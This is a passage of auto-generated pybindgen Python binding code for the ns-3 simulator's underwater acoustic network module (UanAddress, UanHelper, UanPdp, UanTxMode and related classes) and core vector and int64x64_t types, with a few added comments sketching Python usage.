## uan-address.h (module 'uan'): void ns3::UanAddress::CopyFrom(uint8_t const * pBuffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'pBuffer')])
## uan-address.h (module 'uan'): void ns3::UanAddress::CopyTo(uint8_t * pBuffer) [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'pBuffer')])
## uan-address.h (module 'uan'): uint8_t ns3::UanAddress::GetAsInt() const [member function]
cls.add_method('GetAsInt',
'uint8_t',
[],
is_const=True)
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::UanAddress',
[],
is_static=True)
## uan-address.h (module 'uan'): static bool ns3::UanAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
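# Illustrative note (not generated by pybindgen): the UanAddress bindings
# above let UAN MAC addresses be constructed and inspected directly from
# Python, e.g. (assuming the "ns.uan" module name):
#
#   import ns.uan
#   addr = ns.uan.UanAddress(5)
#   print(addr.GetAsInt())                      # -> 5
#   bcast = ns.uan.UanAddress.GetBroadcast()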
def register_Ns3UanHelper_methods(root_module, cls):
## uan-helper.h (module 'uan'): ns3::UanHelper::UanHelper(ns3::UanHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHelper const &', 'arg0')])
## uan-helper.h (module 'uan'): ns3::UanHelper::UanHelper() [constructor]
cls.add_constructor([])
## uan-helper.h (module 'uan'): int64_t ns3::UanHelper::AssignStreams(ns3::NetDeviceContainer c, int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('ns3::NetDeviceContainer', 'c'), param('int64_t', 'stream')])
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, uint32_t nodeid, uint32_t deviceid) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('ns3::NetDeviceContainer', 'd')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('ns3::NodeContainer', 'n')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAsciiAll(std::ostream & os) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('std::ostream &', 'os')],
is_static=True)
## uan-helper.h (module 'uan'): ns3::NetDeviceContainer ns3::UanHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'ns3::NetDeviceContainer',
[param('ns3::NodeContainer', 'c')],
is_const=True)
## uan-helper.h (module 'uan'): ns3::NetDeviceContainer ns3::UanHelper::Install(ns3::NodeContainer c, ns3::Ptr<ns3::UanChannel> channel) const [member function]
cls.add_method('Install',
'ns3::NetDeviceContainer',
[param('ns3::NodeContainer', 'c'), param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_const=True)
## uan-helper.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanHelper::Install(ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::UanChannel> channel) const [member function]
cls.add_method('Install',
'ns3::Ptr< ns3::UanNetDevice >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_const=True)
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetMac(std::string type, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetMac',
'void',
[param('std::string', 'type'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetPhy(std::string phyType, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetPhy',
'void',
[param('std::string', 'phyType'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetTransducer(std::string type, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetTransducer',
'void',
[param('std::string', 'type'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
return
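# Illustrative note (not generated by pybindgen): UanHelper is the usual entry
# point for building UAN topologies from Python scripts. A minimal sketch,
# assuming "ns.network" / "ns.uan" module names and a Ptr<UanChannel> named
# 'channel' created elsewhere:
#
#   import ns.network, ns.uan
#   nodes = ns.network.NodeContainer()
#   nodes.Create(2)
#   helper = ns.uan.UanHelper()
#   devices = helper.Install(nodes, channel)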
def register_Ns3UanModesList_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-tx-mode.h (module 'uan'): ns3::UanModesList::UanModesList(ns3::UanModesList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesList const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanModesList::UanModesList() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): void ns3::UanModesList::AppendMode(ns3::UanTxMode mode) [member function]
cls.add_method('AppendMode',
'void',
[param('ns3::UanTxMode', 'mode')])
## uan-tx-mode.h (module 'uan'): void ns3::UanModesList::DeleteMode(uint32_t num) [member function]
cls.add_method('DeleteMode',
'void',
[param('uint32_t', 'num')])
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanModesList::GetNModes() const [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_const=True)
return
def register_Ns3UanPacketArrival_methods(root_module, cls):
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival(ns3::UanPacketArrival const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPacketArrival const &', 'arg0')])
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival() [constructor]
cls.add_constructor([])
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp, ns3::Time arrTime) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp'), param('ns3::Time', 'arrTime')])
## uan-transducer.h (module 'uan'): ns3::Time ns3::UanPacketArrival::GetArrivalTime() const [member function]
cls.add_method('GetArrivalTime',
'ns3::Time',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPacketArrival::GetPacket() const [member function]
cls.add_method('GetPacket',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::UanPdp ns3::UanPacketArrival::GetPdp() const [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[],
is_const=True)
## uan-transducer.h (module 'uan'): double ns3::UanPacketArrival::GetRxPowerDb() const [member function]
cls.add_method('GetRxPowerDb',
'double',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::UanTxMode const & ns3::UanPacketArrival::GetTxMode() const [member function]
cls.add_method('GetTxMode',
'ns3::UanTxMode const &',
[],
is_const=True)
return
def register_Ns3UanPdp_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(ns3::UanPdp const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPdp const &', 'arg0')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<ns3::Tap, std::allocator<ns3::Tap> > taps, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< ns3::Tap >', 'taps'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<std::complex<double>,std::allocator<std::complex<double> > > arrivals, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< std::complex< double > >', 'arrivals'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<double,std::allocator<double> > arrivals, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< double >', 'arrivals'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): static ns3::UanPdp ns3::UanPdp::CreateImpulsePdp() [member function]
cls.add_method('CreateImpulsePdp',
'ns3::UanPdp',
[],
is_static=True)
## uan-prop-model.h (module 'uan'): __gnu_cxx::__normal_iterator<const ns3::Tap*,std::vector<ns3::Tap, std::allocator<ns3::Tap> > > ns3::UanPdp::GetBegin() const [member function]
cls.add_method('GetBegin',
'__gnu_cxx::__normal_iterator< ns3::Tap const *, std::vector< ns3::Tap > >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): __gnu_cxx::__normal_iterator<const ns3::Tap*,std::vector<ns3::Tap, std::allocator<ns3::Tap> > > ns3::UanPdp::GetEnd() const [member function]
cls.add_method('GetEnd',
'__gnu_cxx::__normal_iterator< ns3::Tap const *, std::vector< ns3::Tap > >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): uint32_t ns3::UanPdp::GetNTaps() const [member function]
cls.add_method('GetNTaps',
'uint32_t',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::UanPdp::GetResolution() const [member function]
cls.add_method('GetResolution',
'ns3::Time',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Tap const & ns3::UanPdp::GetTap(uint32_t i) const [member function]
cls.add_method('GetTap',
'ns3::Tap const &',
[param('uint32_t', 'i')],
is_const=True)
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetNTaps(uint32_t nTaps) [member function]
cls.add_method('SetNTaps',
'void',
[param('uint32_t', 'nTaps')])
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetResolution(ns3::Time resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetTap(std::complex<double> arrival, uint32_t index) [member function]
cls.add_method('SetTap',
'void',
[param('std::complex< double >', 'arrival'), param('uint32_t', 'index')])
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::UanPdp::SumTapsC(ns3::Time begin, ns3::Time end) const [member function]
cls.add_method('SumTapsC',
'std::complex< double >',
[param('ns3::Time', 'begin'), param('ns3::Time', 'end')],
is_const=True)
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::UanPdp::SumTapsFromMaxC(ns3::Time delay, ns3::Time duration) const [member function]
cls.add_method('SumTapsFromMaxC',
'std::complex< double >',
[param('ns3::Time', 'delay'), param('ns3::Time', 'duration')],
is_const=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPdp::SumTapsFromMaxNc(ns3::Time delay, ns3::Time duration) const [member function]
cls.add_method('SumTapsFromMaxNc',
'double',
[param('ns3::Time', 'delay'), param('ns3::Time', 'duration')],
is_const=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPdp::SumTapsNc(ns3::Time begin, ns3::Time end) const [member function]
cls.add_method('SumTapsNc',
'double',
[param('ns3::Time', 'begin'), param('ns3::Time', 'end')],
is_const=True)
return
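# Illustrative note (not generated by pybindgen): UanPdp models a power delay
# profile as a sequence of Taps. A hedged sketch of the API registered above,
# assuming the "ns.uan" module name:
#
#   import ns.uan
#   pdp = ns.uan.UanPdp.CreateImpulsePdp()      # single tap at zero delay
#   for i in range(pdp.GetNTaps()):
#       tap = pdp.GetTap(i)
#       print(tap.GetDelay(), tap.GetAmp())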
def register_Ns3UanPhyListener_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyListener::UanPhyListener() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyListener::UanPhyListener(ns3::UanPhyListener const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyListener const &', 'arg0')])
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyCcaEnd() [member function]
cls.add_method('NotifyCcaEnd',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyCcaStart() [member function]
cls.add_method('NotifyCcaStart',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxEndError() [member function]
cls.add_method('NotifyRxEndError',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxEndOk() [member function]
cls.add_method('NotifyRxEndOk',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxStart() [member function]
cls.add_method('NotifyRxStart',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyTxStart(ns3::Time duration) [member function]
cls.add_method('NotifyTxStart',
'void',
[param('ns3::Time', 'duration')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanTxMode_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::UanTxMode(ns3::UanTxMode const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTxMode const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::UanTxMode() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetBandwidthHz() const [member function]
cls.add_method('GetBandwidthHz',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetCenterFreqHz() const [member function]
cls.add_method('GetCenterFreqHz',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetConstellationSize() const [member function]
cls.add_method('GetConstellationSize',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetDataRateBps() const [member function]
cls.add_method('GetDataRateBps',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::ModulationType ns3::UanTxMode::GetModType() const [member function]
cls.add_method('GetModType',
'ns3::UanTxMode::ModulationType',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): std::string ns3::UanTxMode::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetPhyRateSps() const [member function]
cls.add_method('GetPhyRateSps',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
return
def register_Ns3UanTxModeFactory_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory::UanTxModeFactory(ns3::UanTxModeFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTxModeFactory const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory::UanTxModeFactory() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::CreateMode(ns3::UanTxMode::ModulationType type, uint32_t dataRateBps, uint32_t phyRateSps, uint32_t cfHz, uint32_t bwHz, uint32_t constSize, std::string name) [member function]
cls.add_method('CreateMode',
'ns3::UanTxMode',
[param('ns3::UanTxMode::ModulationType', 'type'), param('uint32_t', 'dataRateBps'), param('uint32_t', 'phyRateSps'), param('uint32_t', 'cfHz'), param('uint32_t', 'bwHz'), param('uint32_t', 'constSize'), param('std::string', 'name')],
is_static=True)
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::GetMode(std::string name) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('std::string', 'name')],
is_static=True)
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::GetMode(uint32_t uid) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'uid')],
is_static=True)
return
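# Illustrative note (not generated by pybindgen): transmission modes are
# normally built through UanTxModeFactory and collected in a UanModesList
# (registered earlier in this file). A hedged sketch; the enum spelling
# UanTxMode.FSK and the numeric parameters are illustrative assumptions:
#
#   import ns.uan
#   mode = ns.uan.UanTxModeFactory.CreateMode(
#       ns.uan.UanTxMode.FSK, 80, 80, 10000, 4000, 2, "FSK-80")
#   modes = ns.uan.UanModesList()
#   modes.AppendMode(mode)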
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
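# Illustrative note (not generated by pybindgen): Vector2D and Vector3D are
# plain value types whose x/y/z fields are exposed as writable instance
# attributes, so positions can be manipulated directly, e.g. (assuming the
# "ns.core" module name):
#
#   import ns.core
#   pos = ns.core.Vector3D(10.0, 0.0, -50.0)
#   pos.z = -100.0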
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
